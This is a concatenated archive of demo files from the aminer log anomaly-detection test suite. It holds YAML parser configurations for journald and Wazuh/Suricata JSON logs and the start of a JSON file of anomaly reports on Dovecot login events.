'link_enable_ipv6' - 'dhcp_lease_acquired' - 'manager_watch_hostname' - 'link_enter_configured' - 'manager_all_configured' - 'manager_set_hostname' - 'button_open' - 'method_set_hostname' - 'manager_receive_response' - 'dns_transaction_process_reply' - id: optional_key_INTERFACE type: FixedWordlistDataModelElement name: 'optional_key_INTERFACE' args: - 'ens3' - 'lo' - id: SYSLOG_IDENTIFIER type: FixedWordlistDataModelElement name: 'SYSLOG_IDENTIFIER' args: - 'kernel' - 'stdout' - 'systemd-journald' - 'systemd-modules-load' - 'systemd-udevd' - 'systemd-networkd-wait-online' - 'systemd-timesyncd' - 'systemd-resolved' - 'systemd-networkd' - 'systemd-logind' - 'systemd-hostnamed' - 'systemd' - 'apparmor' - 'audit' - 'dhclient' - 'cloud-init' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - '/usr/sbin/irqbalance' - 'apport' - 'pollinate' - 'dbus-daemon' - 'polkitd' - 'grub-common' - 'lxcfs' - 'accounts-daemon' - 'networkd-dispatcher' - 'snapd' - 'sshd' - '/usr/bin/logger' - 'ec2' - 'sudo' - id: optional_key_SYSLOG_PID type: DecimalIntegerValueModelElement name: 'optional_key_SYSLOG_PID' - id: optional_key_MESSAGE_ID type: HexStringModelElement name: 'optional_key_MESSAGE_ID' - id: optional_key_SEAT_ID type: FixedWordlistDataModelElement name: 'optional_key_SEAT_ID' args: - 'seat0' - id: msg type: AnyByteDataModelElement name: 'msg' - id: MESSAGE type: OptionalMatchModelElement name: 'MESSAGE' args: msg - id: optional_key__MACHINE_ID type: HexStringModelElement name: 'optional_key__MACHINE_ID' - id: optional_key__HOSTNAME type: FixedWordlistDataModelElement name: 'optional_key__HOSTNAME' args: - 'ubuntu' - 'test-1' - id: optional_key__PID type: DecimalIntegerValueModelElement name: 'optional_key__PID' - id: optional_key__UID type: DecimalIntegerValueModelElement name: 'optional_key__UID' - id: optional_key__GID type: DecimalIntegerValueModelElement name: 'optional_key__GID' - id: optional_key__COMM type: FixedWordlistDataModelElement name: 'optional_key__COMM' args: - 'systemd-journal' - 'apparmor_parser' - 'apparmor' - 'systemd-udevd' - 'dhclient' - 'systemd-network' - 'systemd-timesyn' - 'systemd-resolve' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - 'dbus-daemon' - 'polkitd' - 'lxcfs' - 'accounts-daemon' - 'systemd-logind' - 'systemd-hostnam' - 'systemd' - 'networkd-dispat' - 'snapd' - 'sshd' - 'sudo' - 'cloud-init' - 'logger' - '(systemd)' - id: optional_key__EXE type: FixedWordlistDataModelElement name: 'optional_key__EXE' args: - '/lib/systemd/systemd-journald' - '/bin/dash' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient' - '/usr/bin/python3.6' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - '/usr/sbin/useradd' - '/usr/sbin/rsyslogd' - '/usr/bin/passwd' - '/usr/sbin/cron' - '/usr/bin/dbus-daemon' - '/usr/lib/policykit-1/polkitd' - '/usr/bin/lxcfs' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd' - '/usr/bin/logger' - '/usr/bin/sudo' - '/lib/systemd/systemd' - id: optional_key__CMDLINE type: FixedWordlistDataModelElement name: 'optional_key__CMDLINE' args: - '/lib/systemd/systemd-journald' - '/bin/sh /etc/init.d/apparmor start' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true' - '/usr/bin/python3 /usr/bin/cloud-init init --local' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=final' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - 'useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m' - '/usr/sbin/rsyslogd -n' - 'passwd -l ubuntu' - '/usr/sbin/cron -f' - '/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only' - '/usr/lib/policykit-1/polkitd --no-debug' - '/usr/bin/lxcfs /var/lib/lxcfs/' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd -D' - 'logger -p user info -t ec2 -s' - 'sudo -i' - '/sbin/init' - '/usr/bin/python3 /usr/bin/cloud-init init' - 'logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client successfully seeded [/dev/urandom]' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=config' - 'sshd: ubuntu [priv]' - '(systemd)' - '/lib/systemd/systemd --user' - id: optional_key__CAP_EFFECTIVE type: HexStringModelElement name: 'optional_key__CAP_EFFECTIVE' - id: optional_key__SELINUX_CONTEXT type: FixedWordlistDataModelElement name: 'optional_key__SELINUX_CONTEXT' args: - 'unconfined\n' - id: optional_key__SYSTEMD_CGROUP type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_CGROUP' args: - '/system.slice/systemd-journald.service' - '/system.slice/apparmor.service' - '/system.slice/systemd-udevd.service' - '/system.slice/cloud-init-local.service' - '/system.slice/systemd-networkd.service' - '/system.slice/systemd-timesyncd.service' - '/system.slice/systemd-resolved.service' - '/system.slice/systemd-networkd-wait-online.service' - '/system.slice/rsyslog.service' - '/system.slice/cron.service' - '/system.slice/dbus.service' - '/system.slice/polkit.service' - '/system.slice/lxcfs.service' - '/system.slice/accounts-daemon.service' - '/system.slice/systemd-logind.service' - '/system.slice/systemd-hostnamed.service' - '/system.slice/networkd-dispatcher.service' - '/system.slice/snapd.service' - '/system.slice/ssh.service' - '/system.slice/cloud-final.service' - '/system.slice/cloud-init.service' - '/system.slice/pollinate.service' - '/system.slice/cloud-config.service' - '/user.slice/user-1000.slice/session-1.scope' - '/init.scope' - '/user.slice/user-1000.slice/user@1000.service/init.scope' - '/user.slice/user-1000.slice/user@1000.service' - id: optional_key__SYSTEMD_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_UNIT' args: - 'systemd-journald.service' - 'systemd-networkd.service' - 'systemd-timesyncd.service' - 'systemd-resolved.service' - 'systemd-networkd-wait-online.service' - 'systemd-udevd.service' - 'systemd-logind.service' - 'systemd-hostnamed.service' - 'apparmor.service' - 'cloud-init-local.service' - 'rsyslog.service' - 'cron.service' - 'apport.service' - 'dbus.service' - 'polkit.service' - 'grub-common.service' - 'lxcfs.service' - 'accounts-daemon.service' - 'networkd-dispatcher.service' - 'snapd.service' - 'ssh.service' - 'cloud-final.service' - 'session-1.scope' - 'init.scope' - 'cloud-init.service' - 'pollinate.service' - 'cloud-config.service' - 'user@1000.service' - id: optional_key__SYSTEMD_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_SLICE' args: - 'system.slice' - '-.slice' - 'user-1000.slice' - id: optional_key__SYSTEMD_INVOCATION_ID type: HexStringModelElement name: 'optional_key__SYSTEMD_INVOCATION_ID' - id: optional_key_JOURNAL_NAME type: FixedWordlistDataModelElement name: 'optional_key_JOURNAL_NAME' args: - 'Runtime journal' - 'System journal' - id: fixed_journal_paths type: FixedWordlistDataModelElement name: 'fixed_journal_paths' args: - '/var/log/journal/' - '/run/log/journal/' - id: optional_key_JOURNAL_PATH type: SequenceModelElement name: 'optional_key_JOURNAL_PATH' args: - fixed_journal_paths - hex - id: optional_key_CURRENT_USE type: DecimalIntegerValueModelElement name: 'optional_key_CURRENT_USE' - id: float_number type: DecimalFloatValueModelElement name: 'float_number' - id: memory type: FixedWordlistDataModelElement name: 'memory' args: - 'M' - 'G' - 'K' - id: optional_key_CURRENT_USE_PRETTY type: SequenceModelElement name: 'optional_key_CURRENT_USE_PRETTY' args: - float_number - memory - id: optional_key_MAX_USE type: DecimalIntegerValueModelElement name: 'optional_key_MAX_USE' - id: optional_key_MAX_USE_PRETTY type: SequenceModelElement name: 'optional_key_MAX_USE_PRETTY' args: - float_number - memory - id: optional_key_DISK_KEEP_FREE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_KEEP_FREE' - id: optional_key_DISK_KEEP_FREE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_KEEP_FREE_PRETTY' args: - float_number - memory - id: optional_key_DISK_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_AVAILABLE' - id: optional_key_DISK_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key_LIMIT type: DecimalIntegerValueModelElement name: 'optional_key_LIMIT' - id: optional_key_LIMIT_PRETTY type: SequenceModelElement name: 'optional_key_LIMIT_PRETTY' args: - float_number - memory - id: optional_key_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_AVAILABLE' - id: optional_key_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key__SOURCE_REALTIME_TIMESTAMP type: DecimalIntegerValueModelElement name: 'optional_key__SOURCE_REALTIME_TIMESTAMP' - id: optional_key_JOB_TYPE type: FixedWordlistDataModelElement name: 'optional_key_JOB_TYPE' args: - 'start' - id: optional_key_JOB_RESULT type: FixedWordlistDataModelElement name: 'optional_key_JOB_RESULT' args: - 'done' - id: optional_key_UNIT type: FixedWordlistDataModelElement name: 'optional_key_UNIT' args: - 'systemd-udevd.service' - 'systemd-journal-flush.service' - 'systemd-sysctl.service' - 'systemd-udev-trigger.service' - 'systemd-machine-id-commit.service' - 'systemd-update-utmp.service' - 'systemd-ask-password-console.path' - 'systemd-tmpfiles-setup.service' - 'systemd-timesyncd.service' - 'systemd-networkd.service' - 'systemd-networkd-wait-online.service' - 'systemd-resolved.service' - 'systemd-tmpfiles-clean.timer' - 'systemd-logind.service' - 'systemd-user-sessions.service' - 'systemd-hostnamed.service' - 'systemd-update-utmp-runlevel.service' - 'network-online.target' - 'keyboard-setup.service' - 'cryptsetup.target' - 'local-fs-pre.target' - 'dev-ttyS0.device' - 'systemd-rfkill.socket' - 'dev-disk-by-label-UEFI.device' - 'boot-efi.mount' - 'local-fs.target' - 'plymouth-read-write.service' - 'console-setup.service' - 'ebtables.service' - 'apparmor.service' - 'time-sync.target' - 'cloud-init-local.service' - 'network-pre.target' - 'nss-lookup.target' - 'network.target' - 'cloud-init.service' - 'blk-availability.service' - 'remote-fs-pre.target' - 'remote-fs.target' - 'cloud-config.target' - 'sysinit.target' - 'uuidd.socket' - 'snapd.socket' - 'motd-news.timer' - 'dbus.socket' - 'apt-daily.timer' - 'apt-daily-upgrade.timer' - 'lxd.socket' - 'iscsid.socket' - 'fstrim.timer' - 'timers.target' - 'acpid.path' - 'acpid.socket' - 'paths.target' - 'basic.target' - 'lxd-containers.service' - 'atd.service' - 'cron.service' - 'sockets.target' - 'networkd-dispatcher.service' - 'apport.service' - 'irqbalance.service' - 'rsyslog.service' - 'accounts-daemon.service' - 'pollinate.service' - 'grub-common.service' - 'lxcfs.service' - 'dbus.service' - 'snapd.service' - 'polkit.service' - 'unattended-upgrades.service' - 'plymouth-quit.service' - 'plymouth-quit-wait.service' - 'serial-getty@ttyS0.service' - 'setvtrgb.service' - 'system-getty.slice' - 'getty@tty1.service' - 'getty.target' - 'ssh.service' - 'snapd.seeded.service' - 'cloud-config.service' - 'multi-user.target' - 'graphical.target' - 'cloud-final.service' - 'cloud-init.target' - 'user-1000.slice' - 'user@1000.service' - 'session-1.scope' - id: optional_key_INVOCATION_ID type: HexStringModelElement name: 'optional_key_INVOCATION_ID' - id: optional_key__STREAM_ID type: HexStringModelElement name: 'optional_key__STREAM_ID' - id: optional_key__AUDIT_TYPE type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_TYPE' - id: optional_key__AUDIT_ID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_ID' - id: optional_key__AUDIT_FIELD_APPARMOR type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_APPARMOR' args: - '"STATUS"' - id: optional_key__AUDIT_FIELD_OPERATION type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_OPERATION' args: - '"profile_load"' - id: optional_key__AUDIT_FIELD_PROFILE type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_PROFILE' args: - '"unconfined"' - id: optional_key__AUDIT_FIELD_NAME type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_NAME' args: - 'lxc-container-default-cgns' - 'lxc-container-default-with-mounting' - 'lxc-container-default-with-nesting' - 'lxc-container-default' - '/usr/lib/NetworkManager/nm-dhcp-client.action' - '/usr/lib/NetworkManager/nm-dhcp-helper' - '/usr/lib/connman/scripts/dhclient-script' - '/usr/lib/snapd/snap-confine//mount-namespace-capture-helper' - '/usr/bin/lxc-start' - '/usr/bin/man' - '/usr/lib/snapd/snap-confine' - '/usr/sbin/tcpdump' - 'man_filter' - 'man_groff' - '/sbin/dhclient' - id: optional_key_ADDRESS type: IpAddressDataModelElement name: 'optional_key_ADDRESS' - id: optional_key_PREFIXLEN type: DecimalIntegerValueModelElement name: 'optional_key_PREFIXLEN' - id: optional_key_GATEWAY type: IpAddressDataModelElement name: 'optional_key_GATEWAY' - id: optional_key__AUDIT_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_SESSION' - id: optional_key__AUDIT_LOGINUID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_LOGINUID' - id: optional_key_SESSION_ID type: DecimalIntegerValueModelElement name: 'optional_key_SESSION_ID' - id: optional_key_USER_ID type: FixedWordlistDataModelElement name: 'optional_key_USER_ID' args: - 'ubuntu' - id: optional_key_LEADER type: DecimalIntegerValueModelElement name: 'optional_key_LEADER' - id: optional_key_KERNEL_USEC type: DecimalIntegerValueModelElement name: 'optional_key_KERNEL_USEC' - id: optional_key_USERSPACE_USEC type: DecimalIntegerValueModelElement name: 'optional_key_USERSPACE_USEC' - id: optional_key__SYSTEMD_OWNER_UID type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_OWNER_UID' - id: optional_key_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key_USER_UNIT' args: - 'gpg-agent-ssh.socket' - 'gpg-agent-browser.socket' - 'gpg-agent-extra.socket' - 'paths.target' - 'dirmngr.socket' - 'gpg-agent.socket' - 'sockets.target' - 'basic.target' - 'default.target' - 'timers.target' - id: optional_key_USER_INVOCATION_ID type: HexStringModelElement name: 'optional_key_USER_INVOCATION_ID' - id: optional_key__SYSTEMD_USER_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_SLICE' args: - '-.slice' - id: optional_key__SYSTEMD_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_UNIT' args: - 'init.scope' - 'cloud-config.service' - id: optional_key__SYSTEMD_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_SESSION' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: __CURSOR: __CURSOR __REALTIME_TIMESTAMP: __REALTIME_TIMESTAMP __MONOTONIC_TIMESTAMP: __MONOTONIC_TIMESTAMP _BOOT_ID: _BOOT_ID optional_key__SOURCE_MONOTONIC_TIMESTAMP: optional_key__SOURCE_MONOTONIC_TIMESTAMP _TRANSPORT: _TRANSPORT optional_key_PRIORITY: optional_key_PRIORITY optional_key__KERNEL_SUBSYSTEM: optional_key__KERNEL_SUBSYSTEM optional_key__KERNEL_DEVICE: optional_key__KERNEL_DEVICE optional_key__UDEV_DEVNODE: optional_key__UDEV_DEVNODE optional_key__UDEV_SYSNAME: optional_key__UDEV_SYSNAME SYSLOG_FACILITY: SYSLOG_FACILITY optional_key_CODE_FILE: optional_key_CODE_FILE optional_key_CODE_LINE: optional_key_CODE_LINE optional_key_CODE_FUNC: optional_key_CODE_FUNC optional_key_INTERFACE: optional_key_INTERFACE SYSLOG_IDENTIFIER: SYSLOG_IDENTIFIER optional_key_SYSLOG_PID: optional_key_SYSLOG_PID optional_key_MESSAGE_ID: optional_key_MESSAGE_ID optional_key_SEAT_ID: optional_key_SEAT_ID MESSAGE: MESSAGE optional_key__MACHINE_ID: optional_key__MACHINE_ID optional_key__HOSTNAME: optional_key__HOSTNAME optional_key__PID: optional_key__PID optional_key__UID: optional_key__UID optional_key__GID: optional_key__GID optional_key__COMM: optional_key__COMM optional_key__EXE: optional_key__EXE optional_key__CMDLINE: optional_key__CMDLINE optional_key__CAP_EFFECTIVE: optional_key__CAP_EFFECTIVE optional_key__SELINUX_CONTEXT: optional_key__SELINUX_CONTEXT optional_key__SYSTEMD_CGROUP: optional_key__SYSTEMD_CGROUP optional_key__SYSTEMD_UNIT: optional_key__SYSTEMD_UNIT optional_key__SYSTEMD_SLICE: optional_key__SYSTEMD_SLICE optional_key__SYSTEMD_INVOCATION_ID: optional_key__SYSTEMD_INVOCATION_ID optional_key_JOURNAL_NAME: optional_key_JOURNAL_NAME optional_key_JOURNAL_PATH: optional_key_JOURNAL_PATH optional_key_CURRENT_USE: optional_key_CURRENT_USE optional_key_CURRENT_USE_PRETTY: optional_key_CURRENT_USE_PRETTY optional_key_MAX_USE: optional_key_MAX_USE optional_key_MAX_USE_PRETTY: optional_key_MAX_USE_PRETTY optional_key_DISK_KEEP_FREE: optional_key_DISK_KEEP_FREE optional_key_DISK_KEEP_FREE_PRETTY: optional_key_DISK_KEEP_FREE_PRETTY optional_key_DISK_AVAILABLE: optional_key_DISK_AVAILABLE optional_key_DISK_AVAILABLE_PRETTY: optional_key_DISK_AVAILABLE_PRETTY optional_key_LIMIT: optional_key_LIMIT optional_key_LIMIT_PRETTY: optional_key_LIMIT_PRETTY optional_key_AVAILABLE: optional_key_AVAILABLE optional_key_AVAILABLE_PRETTY: optional_key_AVAILABLE_PRETTY optional_key__SOURCE_REALTIME_TIMESTAMP: optional_key__SOURCE_REALTIME_TIMESTAMP optional_key_JOB_TYPE: optional_key_JOB_TYPE optional_key_JOB_RESULT: optional_key_JOB_RESULT optional_key_UNIT: optional_key_UNIT optional_key_INVOCATION_ID: optional_key_INVOCATION_ID optional_key__STREAM_ID: optional_key__STREAM_ID optional_key__AUDIT_TYPE: optional_key__AUDIT_TYPE optional_key__AUDIT_ID: optional_key__AUDIT_ID optional_key__AUDIT_FIELD_APPARMOR: optional_key__AUDIT_FIELD_APPARMOR optional_key__AUDIT_FIELD_OPERATION: optional_key__AUDIT_FIELD_OPERATION optional_key__AUDIT_FIELD_PROFILE: optional_key__AUDIT_FIELD_PROFILE optional_key__AUDIT_FIELD_NAME: optional_key__AUDIT_FIELD_NAME optional_key_ADDRESS: optional_key_ADDRESS optional_key_PREFIXLEN: optional_key_PREFIXLEN optional_key_GATEWAY: optional_key_GATEWAY optional_key__AUDIT_SESSION: optional_key__AUDIT_SESSION optional_key__AUDIT_LOGINUID: optional_key__AUDIT_LOGINUID optional_key_SESSION_ID: optional_key_SESSION_ID optional_key_USER_ID: optional_key_USER_ID optional_key_LEADER: optional_key_LEADER optional_key_KERNEL_USEC: optional_key_KERNEL_USEC optional_key_USERSPACE_USEC: optional_key_USERSPACE_USEC optional_key__SYSTEMD_OWNER_UID: optional_key__SYSTEMD_OWNER_UID optional_key_USER_UNIT: optional_key_USER_UNIT optional_key_USER_INVOCATION_ID: optional_key_USER_INVOCATION_ID optional_key__SYSTEMD_USER_SLICE: optional_key__SYSTEMD_USER_SLICE optional_key__SYSTEMD_USER_UNIT: optional_key__SYSTEMD_USER_UNIT optional_key__SYSTEMD_SESSION: optional_key__SYSTEMD_SESSION Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-wazuh-demo.yml000066400000000000000000000172241437606560100314430ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/wazuh.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: level type: DecimalIntegerValueModelElement name: 'level' - id: description type: FixedWordlistDataModelElement name: 'description' args: - 'IDS event.' - 'Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character' - id: id type: DecimalIntegerValueModelElement name: 'id' value_pad_type: 'zero' - id: firedtimes type: DecimalIntegerValueModelElement name: 'firedtimes' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: groups type: FixedWordlistDataModelElement name: 'name' args: - 'ids' - 'suricata' - id: name type: FixedWordlistDataModelElement name: 'name' args: - 'user-0' - id: id_sec type: DateTimeModelElement name: 'id_sec' date_format: '%s.%f' - id: full_log type: AnyByteDataModelElement name: 'full_log' - id: predecoder_timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%d/%m/%Y-%H:%M:%S.%f' - id: _parent type: FixedWordlistDataModelElement name: '_parent' args: - 'snort' - id: decoder_name type: FixedWordlistDataModelElement name: 'name' args: - 'snort' - 'json' - id: _srcip type: IpAddressDataModelElement name: '_srcip' - id: dstip_ip type: IpAddressDataModelElement name: 'dstip_ip' - id: colon type: FixedDataModelElement name: 'colon' args: ':' - id: port type: DecimalIntegerValueModelElement name: 'port' - id: _dstip type: SequenceModelElement name: '_dstip' args: - dstip_ip - colon - port - id: data_id type: FixedWordlistDataModelElement name: 'data_id' args: - '1:2221030:1' - id: location type: FixedWordlistDataModelElement name: 'location' args: - '/var/log/forensic/suricata/fast.log' - '/var/log/forensic/suricata/eve.json' - id: _in_iface type: FixedWordlistDataModelElement name: '_in_iface' args: - 'eth0' - id: _event_type type: FixedWordlistDataModelElement name: '_event_type' args: - 'alert' - id: _src_ip type: IpAddressDataModelElement name: '_src_ip' - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: IpAddressDataModelElement name: '_dest_ip' - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'TCP' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'SURICATA HTTP METHOD terminated by non-compliant character' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Generic Protocol Command Decode' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: hostname type: FixedWordlistDataModelElement name: 'hostname' args: - 'mail.cup.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&=+$,/?%#\~ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)' - id: http_content_type type: FixedWordlistDataModelElement name: 'http_content_type' args: - 'text/html' - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: status type: DecimalIntegerValueModelElement name: 'status' - id: length type: DecimalIntegerValueModelElement name: 'length' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp rule: level: level description: description id: id firedtimes: firedtimes mail: bool_wordlist groups: - groups agent: id: id name: name manager: name: name id: id_sec full_log: full_log _predecoder: timestamp: predecoder_timestamp decoder: _parent: _parent name: decoder_name data: _srcip: _srcip _dstip: _dstip _id: data_id _timestamp: timestamp _flow_id: id_sec _in_iface: _in_iface _event_type: _event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _tx_id: _tx_id _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _http: hostname: hostname url: url http_user_agent: http_user_agent http_content_type: http_content_type http_method: http_method protocol: protocol status: status length: length location: location Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/000077500000000000000000000000001437606560100276605ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/aminer.log000066400000000000000000045524711437606560100316600ustar00rootroot00000000000000{ "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(es) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str" ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 12, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Syslog disconnected user info", "Message": "New value combination(s) detected", "PersistenceFileName": "syslog_disconnected_user", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user/user", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method/method", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured" ], "AffectedLogAtomValues": [ null, null, 3232238318, 3232238234, null ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, 